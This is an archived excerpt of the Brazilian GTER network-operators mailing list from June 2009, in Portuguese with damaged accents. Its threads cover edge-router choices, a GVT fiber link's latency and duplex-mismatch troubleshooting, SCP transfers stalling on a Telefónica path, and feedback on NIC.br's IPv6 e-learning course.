<7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> Message-ID: Ol? Marconi, Certamente a op??o 2 rodando na op??o 3 ;) Existe QoS no vyatta. Abs, 2009/6/3 Marconi Pereira > > Caros, > estou pesquisando sobre solu??o de roteador de borda para link entre 100 e > 155Mbps. > > 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + IOS?); > 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de QoS?) > 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a necessidade) > > Obrigado, > M. > > > _________________________________________________________________ > Windows Live? SkyDrive?: Get 25 GB of free online storage. > http://windowslive.com/online/skydrive?ocid=TXT_TAGLM_WL_SD_25GB_062009 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- - Maila Networks - Comunica??o e Seguran?a From herbert at scw.net.br Wed Jun 3 18:49:11 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Wed, 3 Jun 2009 18:49:11 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28_Telef=F3nica_=29?= In-Reply-To: <200906031251.01016.herbert@scw.net.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> <200906031251.01016.herbert@scw.net.br> Message-ID: <200906031849.11954.herbert@scw.net.br> On Wed 03 Jun 2009 12:51:00 Herbert Faleiros wrote: > traffic shapping p/ priorizar os servicos mais essenciais? > (j? que est?o com sobrecarga) Me perguntaram em PVT o que o SCP tinha a ver com traffic shapping neste caso, resposta: j? vi pelo menos dois appliances dessa categoria "confundirem" as transfer?ncias do SCP com P2P encriptado (behaviour detection). -- Herbert From gustkiller at gmail.com Wed Jun 3 19:27:04 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Wed, 3 Jun 2009 19:27:04 -0300 Subject: [GTER] roteador de borda In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> Message-ID: <276fbe8b0906031527g1b2464a0qae4105304edd72cb@mail.gmail.com> mikrotik? 2009/6/3 Marconi Pereira > > Caros, > estou pesquisando sobre solu??o de roteador de borda para link entre 100 e > 155Mbps. > > 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + IOS?); > 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de QoS?) > 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a necessidade) > > Obrigado, > M. > > > _________________________________________________________________ > Windows Live? SkyDrive?: Get 25 GB of free online storage. > http://windowslive.com/online/skydrive?ocid=TXT_TAGLM_WL_SD_25GB_062009 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Wed Jun 3 20:02:49 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Wed, 3 Jun 2009 20:02:49 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <86b352050906031455r6822f719n8ba064b5e9f19de4@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <86b352050906031455r6822f719n8ba064b5e9f19de4@mail.gmail.com> Message-ID: <200906032002.49500.herbert@scw.net.br> On Wed 03 Jun 2009 18:55:31 Antonio Carlos Pina wrote: > O mais chato ? quando ? publicado nas "revistas especializadas" a balela > que "for?ar a porta a 100Mb/s melhora sua performance" e no dia seguinte > temos 20 ou 30 clientes reclamando de lentid?o em suas estruturas porque > fizeram tal altera??o sem atentar para o fato que a porta de switch tem de > mudar junto.... Tive um problema num SDH da Huawei que s? era remediado (n?o resolvia) for?ando 100/full no Cisco conectado ? FE dele. Isso "melhorava" o dano causado pela m? configura??o do SDH, mas nem de longe resolvia. Quando finalmente resolveram "consertar" o SDH, deixar o NIC do Cisco negociar o link (ap?s a FE do Huawei estar funcionando corretamente) fez toda a diferen?a do mundo. :) Antes de resolver o problema, se ficava em auto a FE negociava como 100/half e uma infinidade de colis?es e problemas relacionados (ocasionando danos ?bvios de performance) ocorriam, for?ando como 100/full "melhorava", mas nem de longe resolvia o problema. -- Herbert From pizzolo at gmail.com Wed Jun 3 20:14:27 2009 From: pizzolo at gmail.com (Patrich Pizzolo) Date: Wed, 3 Jun 2009 20:14:27 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <86b352050906031455r6822f719n8ba064b5e9f19de4@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <86b352050906031455r6822f719n8ba064b5e9f19de4@mail.gmail.com> Message-ID: <37899f4a0906031614r22f53fc4h86746b29a53faaeb@mail.gmail.com> Provavelmente eles setaram o transceiver deles para o modo For?ado sim! Meu Fw possui placa Gigabit e tive que for?ar sim, se n?o ele setava como 100Mbps Half e perdia milh?es de pacotes, o link de 10 nao trabalhava nem a 4! por?m desvirtuamos um pouco do assunto, pois meu problema n?o ? bem esse. No momento estou implorando para eles trocarem a porta do switch datacom na qual estou, ? incr?vel como o cliente ? bem tratado! Sendo que desde 7 dias atr?s estou informando que o problema deve estar neste switch, principalmente por que o fato come?ou ap?s uma pane nele. Existe alguma forma de eu obrig?-los a faz?-lo? J? estou considerando a troca de operadora, tenho nesta mesma infra um link da BrT e funciona muito bem, o mesmo est? sendo a salva??o da lavoura. Recebi uma liga??o antes informando que o tempo de resposta n?o pode ser usado como m?trica pois eles descartam icmp em links com muito tr?fego, mas entre as duas pontas da fibra??? 2009/6/3 Antonio Carlos Pina > Pessoal, por favor. > > Se um lado est? FOR?ADO, o outro precisar? ficar FOR?ADO tamb?m. Se um lado > est? AUTONEG, o outro fica em AUTONEG. > > N?o vamos misturar os sintomas com o resultado. Exemplos citados: > > a) Vers?o de firmware antiga (e com bug). Cisco ? o exemplo cl?ssico (e > roteadores pequenos ethernet s?o DE FATO 10Mb/s Half ou 100Mb/s Half) > b) Configura??o "misteriosa" de um dos lados (por exemplo, em conversor) > que > n?o sabemos qual ? e no nosso lado termos que for?ar (porque na verdade o > outro lado est? for?ado) > c) Equipamentos que n?o adiram ? especifica??o conforme o Gustavo colocou > (gra?as a Deus nunca peguei um destes). > d) Cabeamento ruim (for?ar a porta mascara o problema) > > O mais chato ? quando ? publicado nas "revistas especializadas" a balela > que > "for?ar a porta a 100Mb/s melhora sua performance" e no dia seguinte temos > 20 ou 30 clientes reclamando de lentid?o em suas estruturas porque fizeram > tal altera??o sem atentar para o fato que a porta de switch tem de mudar > junto.... > > > 2009/6/3 Patrich Pizzolo > > > Obrigado pelas respostas, > > n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias > > atr?s este problema aqui, s? ficou ok quando forcei minha eth para > 100Mbps > > Full-Duplex! > > Por?m o problema est? bem isolado, j? coloquei diversos notebooks e > > desktops > > e o problema sempre persiste sim! > > > > Creio que seja exatamente o caso de porta do Switch Datacom no qual o > > Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de > conta > > e ouvidoria para verificarem isto e eles continuam afirmando > > categoricamente > > que n?o h? problema! > > > > Alguma id?ia? > > > > > > 2009/6/3 Juliano S. Nascimento > > > > > > > > > > > > > > > Voce checou poss?veis port-mismatch ? > > > Auto-negocia??o X portas for?adas ? > > > > > > > > Corre uma lenda por a? que as portas fastethernet devem ser > > > for?adas a > > > > 100Mb/s. Na verdade essa hist?ria > > > remonta h? anos quando existia um bug na > > > > > > > negocia??o de alguns equipamentos que faziam os mesmos > > > negociarem como > > > > half. > > > > Isso acabou e s? sobrou a > > > lenda. > > > > > > > > A regra ?: > > > > > > > > - > > > Auto-negocia??o com auto-negoci???o > > > > - Porta for?ada (sem autoneg) com Porta for?ada > > > > > > > > Qualquer outra combina??o trar? > > > problemas. > > > > > > > > Voc? colocou 1 notebook ligado > > > direto no link para eliminar problemas com > > > > sua rede, seu > > > firewall, etc? > > > > > > > > Grato. > > > > > > > > 2009/6/3 > > > Patrich Pizzolo > > > > > > > >> Bom dia > > > a todos, > > > >> gostaria de ter uma opini?o dos ilustres > > > colegas que integram esta > > > >> lista. > > > >> Tenho um link > > > de 10Mbps por fibra e ap?s um problema em um switch da GVT > > > >> meu > > > >> tempo de resposta entre a Eth do meu router e > > > a do router da gvt que s?o > > > >> interligados por uma fibra > > > est? chegando a picos de at? 946ms com uma > > > >> > > > m?dia > > > >> em torno de 10ms, isso com o link isolado e > > > j? testei com diversos > > > >> outros > > > >> routers e > > > sempre obtenho os mesmos tempos de resposta, definitivamente > > > >> > > > n?o > > > >> tenho problema nesta ponta. Possuo um outro link > > > com a BrT e est? tudo > > > >> normal com tempo de resposta > > > excelente sem nenhuma varia??o deste tipo. > > > >> > > > Estou nesta situa??o h? 7 dias e o pessoal da > > > operadora insiste em dizer > > > >> que > > > >> est? > > > tudo normal. J? nem aguento mais falar com eles... > > > >> > > > >> Algu?m tem alguma id?ia? > > > >> > > > >> No momento estou pensando em acionar e cancelar o link. > > > > > > Caro, > > > > > > Tivemos o mesmo problema algum tempo atras com a > > > GVT. Depois de muitos testes e alegarem que nossos servidores estavam > mal > > > configurados e n?o terem resultados positivos com esta > > > afirma??o, trocaram nossa porta no Switch deles, resolvendo > > > nosso problema. > > > > > > OBS: Alegaram que a vlan estava com uma > > > configura??o errada, ocasionado tais problemas. > > > > > > > > > > > > >> > > > >> Abra?os, > > > >> > > > Obrigado! > > > >> -- > > > >> gter list > > > https://eng.registro.br/mailman/listinfo/gter > > > >> > > > > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > > > > > -- > > > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > > > -- > > Abra?os, > > > > Patrich Pizzolo > > IT Coordinator > > +55-48-9944-9090 > > +55-47-8407-7768 > > pizzolo at gmail.com > > Skype: pizzolo_br > > MSN: patrich_pizzolo at hotmail.com > > SL: Xpiz Beam > > Taikodom: Deathwing_br > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From andre at ibtelecom.net.br Wed Jun 3 21:07:20 2009 From: andre at ibtelecom.net.br (=?UTF-8?B?QW5kcsOpIENvc3Rh?=) Date: Wed, 3 Jun 2009 21:07:20 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> Message-ID: Caros colegas, Se for envolvido equipamento DATACOM realmente existe at? uma nota no site deles falando sobre o assunto, as teles tem seguido o conselho de for?ar a porta. Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e outros problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. 2009/6/3 Patrich Pizzolo > Obrigado pelas respostas, > n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias > atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps > Full-Duplex! > Por?m o problema est? bem isolado, j? coloquei diversos notebooks e > desktops > e o problema sempre persiste sim! > > Creio que seja exatamente o caso de porta do Switch Datacom no qual o > Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta > e ouvidoria para verificarem isto e eles continuam afirmando > categoricamente > que n?o h? problema! > > Alguma id?ia? > > > 2009/6/3 Juliano S. Nascimento > > > > > > > > > > Voce checou poss?veis port-mismatch ? > > Auto-negocia??o X portas for?adas ? > > > > > > Corre uma lenda por a? que as portas fastethernet devem ser > > for?adas a > > > 100Mb/s. Na verdade essa hist?ria > > remonta h? anos quando existia um bug na > > > > > negocia??o de alguns equipamentos que faziam os mesmos > > negociarem como > > > half. > > > Isso acabou e s? sobrou a > > lenda. > > > > > > A regra ?: > > > > > > - > > Auto-negocia??o com auto-negoci???o > > > - Porta for?ada (sem autoneg) com Porta for?ada > > > > > > Qualquer outra combina??o trar? > > problemas. > > > > > > Voc? colocou 1 notebook ligado > > direto no link para eliminar problemas com > > > sua rede, seu > > firewall, etc? > > > > > > Grato. > > > > > > 2009/6/3 > > Patrich Pizzolo > > > > > >> Bom dia > > a todos, > > >> gostaria de ter uma opini?o dos ilustres > > colegas que integram esta > > >> lista. > > >> Tenho um link > > de 10Mbps por fibra e ap?s um problema em um switch da GVT > > >> meu > > >> tempo de resposta entre a Eth do meu router e > > a do router da gvt que s?o > > >> interligados por uma fibra > > est? chegando a picos de at? 946ms com uma > > >> > > m?dia > > >> em torno de 10ms, isso com o link isolado e > > j? testei com diversos > > >> outros > > >> routers e > > sempre obtenho os mesmos tempos de resposta, definitivamente > > >> > > n?o > > >> tenho problema nesta ponta. Possuo um outro link > > com a BrT e est? tudo > > >> normal com tempo de resposta > > excelente sem nenhuma varia??o deste tipo. > > >> > > Estou nesta situa??o h? 7 dias e o pessoal da > > operadora insiste em dizer > > >> que > > >> est? > > tudo normal. J? nem aguento mais falar com eles... > > >> > > >> Algu?m tem alguma id?ia? > > >> > > >> No momento estou pensando em acionar e cancelar o link. > > > > Caro, > > > > Tivemos o mesmo problema algum tempo atras com a > > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal > > configurados e n?o terem resultados positivos com esta > > afirma??o, trocaram nossa porta no Switch deles, resolvendo > > nosso problema. > > > > OBS: Alegaram que a vlan estava com uma > > configura??o errada, ocasionado tais problemas. > > > > > > > > >> > > >> Abra?os, > > >> > > Obrigado! > > >> -- > > >> gter list > > https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > -- > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Abra?os, > > Patrich Pizzolo > IT Coordinator > +55-48-9944-9090 > +55-47-8407-7768 > pizzolo at gmail.com > Skype: pizzolo_br > MSN: patrich_pizzolo at hotmail.com > SL: Xpiz Beam > Taikodom: Deathwing_br > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Andr? Costa Chief Executive Officer Ib?ria Brasil Telecomunica??es (71) 2223-9026 / 7811-5816 NEXTEL 55*91*9228 From globalx at gmail.com Wed Jun 3 21:54:00 2009 From: globalx at gmail.com (Anderson Goulart) Date: Wed, 3 Jun 2009 21:54:00 -0300 Subject: [GTER] e-learning IPv6 do NIC.br In-Reply-To: <700db58a0906031156x48c726f6ic2c4122bf67638c2@mail.gmail.com> References: <4A247806.20301@nic.br> <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> <700db58a0906031156x48c726f6ic2c4122bf67638c2@mail.gmail.com> Message-ID: <2dede0e60906031754m3db40d6bgd97c990bec6385e6@mail.gmail.com> Ol? Raul, Com certeza a iniciativa ? v?lida e importante, como coloquei. S? fiz algumas coloca??es sobre metodologias de EAD, com intuito de contrubuir em futuras cria??es de materiais. Apesar de ser introdut?rio, quanto mais atrativo for o conte?do, maior ser? o interesse dos implementadores de IPv6. Abra?os, Global 2009/6/3 Raul Lib?rio > Global, > > Por pior que seja, ainda ? uma iniciativa. O curso ? introdut?rio, ou > seja, n?o ? com esse curso que o cara vai come?ar a utilizar IPv6. > Melhoras vem com o decorrer do tempo(ou com a urg?ncia da > necessidade). IPv6 n?o ? bicho de 7 cabe?as, s? ? um pouco mais > complicado do que achamos 'normal'(v4). Quem realmente tem necessidade > de aprender vai ter de correr atr?s de materiais mais did?ticos e > completos. > > Abra?o! > > 2009/6/3 Anderson Goulart : > > Ol? Ant?nio e demais, > > > > ? uma ?tima iniciativa do CGI.br e NIC.br, entretanto, gostaria que > revissem > > os modelos de e-learning considerados para este e outros cursos. Talvez > eles > > n?o sejam suficientes para alcan?ar o objetivo de voc?s: disseminar o > IPv6 e > > incentivar a migra??o. Digo isso porque estamos conversando sobre o tema > na > > lista de EAD da Unicamp e alguns estudos j? foram feitos sobre a > capacidade > > de aprendizado das pessoas. Vou reproduzir abaixo, um trecho de uma das > > mensagens do professor Milton Sobreiro que resume a discuss?o: > > > > "Minha especializa??o em EAD conclu? com um Estudo de > > Caso intitulado"Teleaula: Uma outra face da Educomunica??o", onde > trabalho a > > quest?o da Teleaula sem tirar os olhos em algumas teorias de fundamental > > import?ncia - Teoria Cognitiva, Teoria da Comunica??o e Estilos de > > Aprendizagem. Para que tivesse uma subst?ncia pr?tica, afinal se tratava > de > > um Estudo de Caso, fiz uma pesquisa de campo com 100 acad?micos de > gradua??o > > e p?s-gradua??o lato-senso na modalidade EAD, afim de identificar seus > > estilos de aprendizagem de maior predomin?ncia, onde obtive o seguinte > > resultado: os estudantes com predomin?ncia sinest?sica somavam 68%, os > > visuais 25%, os que apresentavam um "empate t?cnico" entre visual e > > sinest?sico eram 4%, s? ent?o vinham os puramente auditivos com 2% e os > > visuais auditivos com 1%. > > O formato da Teleaula, produzidas com professores em plano americano, > slides > > est?ticos, pouca movimenta??o, mudan?as de entona??es nas vozes ou BG > > sonoro, onde este docente fala, apenas, e monotonamente, e para piorar a > > situa??o deixam os slides muito pouco tempo no ar, para que o professor > > continue como o detentor pleno do conhecimento, se aproxima ? Educa??o > > Banc?ria, repudiada por Paulo Freire, de compet?ncia pedag?gica > > indiscut?vel. Ele s? atinge ao auditivo, que aprende com facilidade > apenas > > ouvindo, mas o visual, que precisa ver o objeto de aprendizado para fazer > > suas analogias e mapas mentais, assim como o sinest?sico que precisa > > executar atividades, ver movimenta??es e entona??es diferenciadas na voz, > > ficam perdidos, dependendo de uma grava??o da aula para que possam > > reassist?-las assincronamente para parar, observar os slides, talvez > > anot?-los, ou experiment?-los, reouvir algumas falas do docente, para s? > > ent?o, tirar alguma coisa da aula... a? j? perdeu a oportunidade de > > intera??o ao vivo com aquele professor." > > > > Considerando o modelo proposto por voc?s no curso de IPv6, um n?mero > pequeno > > conseguir? absorver o conte?do ou assistir at? o fim. Minha opini?o sobre > o > > que j? assisti: > > > > - A pessoa que diz o texto parece n?o saber nada sobre o assunto. Ela > tenta > > dar ?nfase em trechos das frases para parecer que sabe > > - A voz ? cont?nua, sem varia??es > > - A pessoa n?o acrescenta nada al?m do que j? est? escrito. Porque n?o > fazer > > um manual ou cartilha ent?o? > > - A leitura ? lenta, cansativa para o ouvinte > > - Os detalhes visuais dos bot?es, menus, etc chamam mais aten??o do que o > > pr?prio material > > - N?o h? como tirar d?vidas no modelo proposto (excluindo as listas como > a > > do GTER) > > - Seria interessante ter comments abaixo da apresenta??o para troca de > > id?ias sobre o tema > > > > Bom, n?o sei se isso ? relevante para o trabalho de voc?s, mas fica > > registrado como informa??o para quem desejar produzir novos cursos de > EAD. > > > > > > Abra?os, global > > > > 2009/6/1 Antonio M. Moreiras > > > >> Senhores, > >> > >> Dando continuidade ?s a??es do CGI.br e NIC.br em favor do uso > >> do IPv6 no Brasil, entrou hoje em funcionamento o site: > >> > >> http://curso.ipv6.br > >> > >> com nosso "Curso de Introdu??o ao IPv6" em formato e-learning. > >> > >> Esperamos que seja ?til! Por gentileza, divulguem. > >> > >> Atenciosamente, > >> > >> -- > >> Antonio M. Moreiras > >> moreiras at nic.br > >> http://www.ceptro.br > >> > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > > Raul Lib?rio > http://rauhmaru.blogspot.com/ > rauhmaruts?hotmail?com > Linux user#4444581 > > "The bug is on the table." > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From globalx at gmail.com Wed Jun 3 22:12:20 2009 From: globalx at gmail.com (Anderson Goulart) Date: Wed, 3 Jun 2009 22:12:20 -0300 Subject: [GTER] e-learning IPv6 do NIC.br In-Reply-To: <4A26CE70.3010407@nic.br> References: <4A247806.20301@nic.br> <2dede0e60906030821l7a7e2685pfb5f4ad029fc5f83@mail.gmail.com> <4A26CE70.3010407@nic.br> Message-ID: <2dede0e60906031812t3be00576u46ca2e090f5e16c6@mail.gmail.com> Ol? Ant?nio, 2009/6/3 Antonio M. Moreiras > Ol? Anderson, > > Agrade?o as cr?ticas e acredito que elas sejam pertinentes. > ?timo.. > > ? bom dizer que contratamos uma empresa especializada e com boa > experi?ncia de mercado na ?rea, que nos auxiliou na maioria dos aspectos > que voc? citou. Suponho, entretanto, que o que ? estado da arte na > academia, n?o seja ainda o estado da arte no mercado... > Bom, n?o fa?o parte da Unicamp, mas sim da lista de EAD hospedada por ela. L? se discute metodologias, id?ias, software e tudo relacionado ? EAD. Nesta lista n?o h? s? acad?micos, na verdade h? sim um mont?o de empres?rios querendo usar o EAD para vender seus cursos nas universidades p?blicas (cursos de extens?o e p?s) e privadas. Portanto, minhas coloca??es n?o s?o t?o acad?micas assim e j? est?o espalhadas pelo mundo afora. https://www.listas.unicamp.br/mailman/listinfo/ead-l Eu n?o quero julgar a capacidade t?cnica da empresa contratada, pois tamb?m n?o sou um especialista no assunto, mas me interesso muito por EAD pois adoro estudar e ensinar. Sou um cr?tico chato e tento sempre aplicar os m?todos em mim para ver se n?o vou ficar com sono, com prgui?a ou se o rendimento ser? interessante. Sou um cobaia de mim e de outras experi?ncias no que se relaciona com ensino, aprendizagem, pedagogia, etc. N?o sou pedagogo, mas um computeiro interessado na ?rea, apenas. > > Temos outras ferramentas, que suponho, amenizem a situa??o e > complementem o curso, como o site (http://ipv6.br), sala de chat no IRC > e, em breve, cursos presenciais com laborat?rio. > S?o totalmente pertinentes. > > Se voc? ou o pessoal de EAD da Unicamp puder nos fornecer sugest?es > pontuais e pr?ticas sobre como melhorar o curso em si, faremos o > poss?vel para implement?-las. Se houver algu?m disposto a usar o > conte?do produzido e criar um curso totalmente novo e baseado em > melhores t?cnicas, certamente autorizaremos o uso do material. > Posso fazer esta sugest?o para o pessoal da lista, mas como seu car?ter l? ? discutir metodologias de EAD, n?o sei como um curso de IPv6 ser? recebido! :D Minhas sugest?es simples seriam as seguintes: - Lan?e esse mesmo material no formato de livro em pdf. J? que a mulher n?o fala nada al?m do que est? escrito, talvez seja mais r?pido para o interlocutor ler o texto do que escutar o que ela est? falando. Eu fiquei com muita pregui?a em alguns momentos do curso. Em alguns slides, eu tinha que esperar aparecer todas as frases pra ver se tinha algo de interessante, j? que as primeiras eu ja sabia e n?o queria esperar a mulher terminar de falar. - Fa?a uma experi?ncia simples: coloque algum de voc?s para "regravar" a aula da seguinte maneira: utilize uma linguagem natural, sem ler os slides, tentando explicar as id?ias, sem precisar fazer roteiros nem nada. Mas tem que ser algu?m que entenda muito do assunto, para poder fazer coment?rios extras, etc. Publique e veja os resultados e coment?rios aqui na lista. Tem v?rios softwares que fazem isso como o camtasia (trial dispon?vel) e gtk_recordmydesktop (free). Se pudesse incluir exemplos de como configurar a rede IPv6 em linux/windows/bsd seria legal. Algo como um laborat?rio gravado. - Um terceiro ponto: tente voc? mesmo assistir todo o curso como se fosse um aluno. Fa?a suas pr?prias cr?ticas. Ou pe?a algu?m da sua fam?lia para ver o material. Eles devem ter opini?es t?o pertinentes quanto ?s minhas. Eu sempre uso meus irm?os/namorada como cobaias! :D Abra?os, global From Bruno at Openline.com.br Thu Jun 4 10:00:35 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Thu, 04 Jun 2009 10:00:35 -0300 Subject: [GTER] Problemas GVT - o que fazer? Message-ID: <1244120435009.Bruno@Openline.com.br> --- Herbert Faleiros escreveu: > Tive um problema num SDH da Huawei que s? era remediado (n?o resolvia) > for?ando 100/full no Cisco conectado ? FE dele. Isso "melhorava" o dano > causado pela m? configura??o do SDH, mas nem de longe resolvia. > > Quando finalmente resolveram "consertar" o SDH, deixar o NIC do Cisco > negociar o link (ap?s a FE do Huawei estar funcionando corretamente) > fez toda a diferen?a do mundo. :) > > Antes de resolver o problema, se ficava em auto a FE negociava como > 100/half e uma infinidade de colis?es e problemas relacionados > (ocasionando danos ?bvios de performance) ocorriam, for?ando como > 100/full "melhorava", mas nem de longe resolvia o problema. Tive o mesmo problema m?s passado, tamb?m com cisco e Huawei. A solu??o que demos foi trocar o hauwei por uma metro ethernet (da concorr?ncia) com fibra + transceivers monomodo []s, !3runo Cabral From jarruda-gter at jarruda.com Thu Jun 4 10:53:37 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Thu, 04 Jun 2009 09:53:37 -0400 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28_Telef=F3nica_=29?= In-Reply-To: <200906031849.11954.herbert@scw.net.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> <200906031251.01016.herbert@scw.net.br> <200906031849.11954.herbert@scw.net.br> Message-ID: <4A27D1E1.6020506@jarruda.com> Herbert Faleiros wrote: > On Wed 03 Jun 2009 12:51:00 Herbert Faleiros wrote: >> traffic shapping p/ priorizar os servicos mais essenciais? >> (j? que est?o com sobrecarga) > > > Me perguntaram em PVT o que o SCP tinha a ver com traffic shapping neste caso, > resposta: j? vi pelo menos dois appliances dessa categoria "confundirem" as > transfer?ncias do SCP com P2P encriptado (behaviour detection). > Curioso...deveria ser facil de 'pegar' como algo diferente...vou ver como a gente trata, nunca tive curiosidade de testar :-).. Complicado mesmo e' fazer matching de trafego assimetrico, sem um canal de sincronizacao entre os DPIs, sera que era neste caso que o SCP 'caiu' em P2P ? > -- > Herbert > -- > gter list https://eng.registro.br/mailman/listinfo/gter From jarruda-gter at jarruda.com Thu Jun 4 10:56:07 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Thu, 04 Jun 2009 09:56:07 -0400 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <200906032002.49500.herbert@scw.net.br> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <86b352050906031455r6822f719n8ba064b5e9f19de4@mail.gmail.com> <200906032002.49500.herbert@scw.net.br> Message-ID: <4A27D277.8010507@jarruda.com> Herbert Faleiros wrote: > On Wed 03 Jun 2009 18:55:31 Antonio Carlos Pina wrote: >> O mais chato ? quando ? publicado nas "revistas especializadas" a balela >> que "for?ar a porta a 100Mb/s melhora sua performance" e no dia seguinte >> temos 20 ou 30 clientes reclamando de lentid?o em suas estruturas porque >> fizeram tal altera??o sem atentar para o fato que a porta de switch tem de >> mudar junto.... > > Tive um problema num SDH da Huawei que s? era remediado (n?o resolvia) > for?ando 100/full no Cisco conectado ? FE dele. Isso "melhorava" o dano > causado pela m? configura??o do SDH, mas nem de longe resolvia. > > Quando finalmente resolveram "consertar" o SDH, deixar o NIC do Cisco negociar > o link (ap?s a FE do Huawei estar funcionando corretamente) fez toda a > diferen?a do mundo. :) > > Antes de resolver o problema, se ficava em auto a FE negociava como 100/half e > uma infinidade de colis?es e problemas relacionados (ocasionando danos ?bvios > de performance) ocorriam, for?ando como 100/full "melhorava", mas nem de longe > resolvia o problema. > Parallel detection: 'Se um lado esta em autoneg, e o outro sem autonegociacao, o lado com autoneg PODE pegar a velocidade (NLP x FLP), so que ele MUST entrar em half-duplex, e' mais que uma boa ideia, e' a norma' :-).. From antoniocarlospina at gmail.com Thu Jun 4 11:06:58 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Thu, 4 Jun 2009 11:06:58 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_na_TIWS_=28_Telef=F3nica_=29?= In-Reply-To: <4A27D1E1.6020506@jarruda.com> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <86b352050906030558m6804f4d3gd0038c96e14ec41d@mail.gmail.com> <200906031251.01016.herbert@scw.net.br> <200906031849.11954.herbert@scw.net.br> <4A27D1E1.6020506@jarruda.com> Message-ID: <86b352050906040706mb0058fdka899347aa28395a1@mail.gmail.com> O interessante desse teste com SCP foi o seguinte: Origem: 1 Servidor, dois endere?os IP na mesma placa de rede. Destino: 1 Servidor hospedado no The Planet SCP usando como origem o IP 1 = Transfer?ncia OK SCP usando como origem o IP 2 = Aborta em 2MB do arquivo transferido, *n?o importando o tamanho do arquivo*. Sempre aborta em 2MB. Testamos com arquivos de 3MB, 5MB, 10MB e 100MB. Aborta sempre em em 2MB. Bastante interessante ;-) E como disse o Raphael, resolveu quando manipulamos nossos anuncios para for?ar a entrada do The Planet por nosso link OI. Abs 2009/6/4 Julio Arruda > Herbert Faleiros wrote: > >> On Wed 03 Jun 2009 12:51:00 Herbert Faleiros wrote: >> >>> traffic shapping p/ priorizar os servicos mais essenciais? >>> (j? que est?o com sobrecarga) >>> >> >> >> Me perguntaram em PVT o que o SCP tinha a ver com traffic shapping neste >> caso, resposta: j? vi pelo menos dois appliances dessa categoria >> "confundirem" as transfer?ncias do SCP com P2P encriptado (behaviour >> detection). >> >> Curioso...deveria ser facil de 'pegar' como algo diferente...vou ver como > a gente trata, nunca tive curiosidade de testar :-).. > Complicado mesmo e' fazer matching de trafego assimetrico, sem um canal de > sincronizacao entre os DPIs, sera que era neste caso que o SCP 'caiu' em P2P > ? > > > -- >> Herbert >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Thu Jun 4 11:55:50 2009 From: herbert at scw.net.br (Herbert 